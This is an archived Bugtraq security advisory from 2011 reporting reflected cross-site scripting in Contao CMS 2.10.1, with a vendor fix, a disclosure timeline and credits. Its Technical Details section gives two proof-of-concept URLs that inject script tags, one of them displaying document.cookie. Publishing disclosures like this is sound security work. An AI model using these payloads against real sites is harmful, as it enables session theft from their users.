lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <201110080759.p987xRL5024150@sf01web2.securityfocus.com>
Date: Sat, 8 Oct 2011 07:59:27 GMT
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: Contao 2.10.1 Cross-site scripting vulnerability

Advisory:              	Contao 2.10.1 Cross-site scripting vulnerability
Advisory ID:           	SSCHADV2011-025
Author:                	Stefan Schurtz
Affected Software:  	Successfully tested on Contao 2.10.1
Vendor URL:          	http://www.contao.org/
Vendor Status:       	fixed
CVE-ID:                	-

==========================
Vulnerability Description:
==========================

Contao 2.10 is prone to multiple Cross-site scripting vulnerability

==================
Technical Details:
==================

http://<target>/contao-2.10.1/index.php/teachers.html?"/><script>alert('xss')</script>
http://<target>/contao-2.10.1/index.php/teachers/'"</style></script><script>alert(document.cookie)</script>

=========
Solution:
=========

- Vendor patch available - http://dev.contao.org/projects/typolight/repository/revisions/1041
- Release of a new version 2.10.2 next week

====================
Disclosure Timeline:
====================

07-Oct-2011 - informed developers (contao@...trobots.com)
07-Oct-2011 - vendor fix
08-Oct-2011 - release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.contao.org/
http://dev.contao.org/projects/typolight/repository/revisions/1041
http://www.rul3z.de/advisories/SSCHADV2011-025.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ